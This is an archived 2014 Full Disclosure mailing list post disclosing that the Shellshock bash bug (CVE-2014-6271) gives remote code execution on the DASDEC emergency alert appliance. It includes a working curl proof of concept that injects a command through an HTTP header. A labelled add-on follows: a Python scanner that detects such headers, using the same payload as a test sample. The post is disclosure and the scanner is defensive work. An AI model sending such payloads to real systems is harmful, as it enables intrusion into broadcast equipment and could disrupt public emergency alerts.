Open Source and information security mailing list archives
Message-ID: <8342595e-60ea-4a75-8412-c91d3e362a9c@vt.edu>
Date: Fri, 26 Sep 2014 14:02:51 -0400
From: Matt Hazinski <mhazinsk@...edu>
To: <fulldisclosure@...lists.org>
Subject: Re: [FD] Critical bash vulnerability CVE-2014-6271

On Thu, Sep 25, 2014 at 02:39:55PM +0200, Philip Cheong wrote:
> Worse than Heartbleed?
>
> http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-6271
>
> http://arstechnica.com/security/2014/09/bug-in-bash-shell-creates-big-security-hole-on-anything-with-nix-in-it/
>

I'm able to get remote code execution via CVE-2014-6271 on the Digital
Alert Systems DASDEC. This appliance is used by broadcasters to send and
receive Emergency Alert System messages over IP and AFSK. Once
authenticated, an attacker can interrupt broadcasts (via a relay) and
play arbitrary audio over the airwaves.

Exploiting it only requires a malicious HTTP header:

curl -H 'X-Shell-Shock: () { :; }; /bin/echo vulnerable > /tmp/dumped_file' \
    http://192.168.0.45/dasdec/dasdec.csp

[matt@...T-EAS ~]# cat /tmp/dumped_file 
vulnerable

Commands are executed as the apache user, but privilege escalation can
still be obtained through CVE-2009-2692 despite the vendor's recent
cumulative security patch.

I suspect all versions of the DASDEC are vulnerable to this, although I 
only have a DASDEC-1EN running software version 2.0-2 to test.

-- 
Matt Hazinski
mhazinsk@...edu
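
As an added defender-side example (not code from the post or from the vendor): a Python scanner that flags request headers carrying the bash function-definition prefix that CVE-2014-6271 abused, and reports the CGI environment variable each flagged header would become in the child process. The regex and the two sample requests are constructed for this example.

```python
import re
from typing import Dict, List, Tuple

# Bash before the fix imported any environment variable whose value began
# with "() {" as a function definition and kept parsing past the closing
# brace, which is what CVE-2014-6271 abused. Payloads vary the whitespace,
# so match a tolerant form of the prefix (assumed pattern for this example).
SHELLSHOCK_RE = re.compile(r"^\s*\(\s*\)\s*\{")

def parse_headers(raw_request: str) -> List[Tuple[str, str]]:
    """Split a raw HTTP/1.x request into (name, value) header pairs."""
    head = raw_request.split("\r\n\r\n", 1)[0]
    headers = []
    for line in head.split("\r\n")[1:]:  # skip the request line
        if line:
            name, _, value = line.partition(":")
            headers.append((name.strip(), value.strip()))
    return headers

def cgi_env_name(header: str) -> str:
    """Environment variable name a CGI gateway gives a request header."""
    return "HTTP_" + re.sub(r"[^A-Za-z0-9]", "_", header).upper()

def scan_request(raw_request: str) -> List[Dict[str, str]]:
    """One finding per header whose value looks like a bash function
    definition, with the env var it would become in a CGI child process."""
    findings = []
    for name, value in parse_headers(raw_request):
        if SHELLSHOCK_RE.search(value):
            findings.append({"header": name, "env": cgi_env_name(name), "value": value})
    return findings

# Constructed samples: the header shape from the post, and a benign request.
MALICIOUS = (
    "GET /dasdec/dasdec.csp HTTP/1.1\r\n"
    "Host: 192.168.0.45\r\n"
    "X-Shell-Shock: () { :; }; /bin/echo vulnerable > /tmp/dumped_file\r\n"
    "\r\n"
)
BENIGN = (
    "GET /dasdec/dasdec.csp HTTP/1.1\r\n"
    "Host: 192.168.0.45\r\n"
    "User-Agent: curl/7.37.0\r\n"
    "\r\n"
)

if __name__ == "__main__":
    for hit in scan_request(MALICIOUS):
        print(f"{hit['header']} -> {hit['env']}: {hit['value']}")
    print("benign findings:", scan_request(BENIGN))
```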

_______________________________________________
Sent through the Full Disclosure mailing list
http://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/
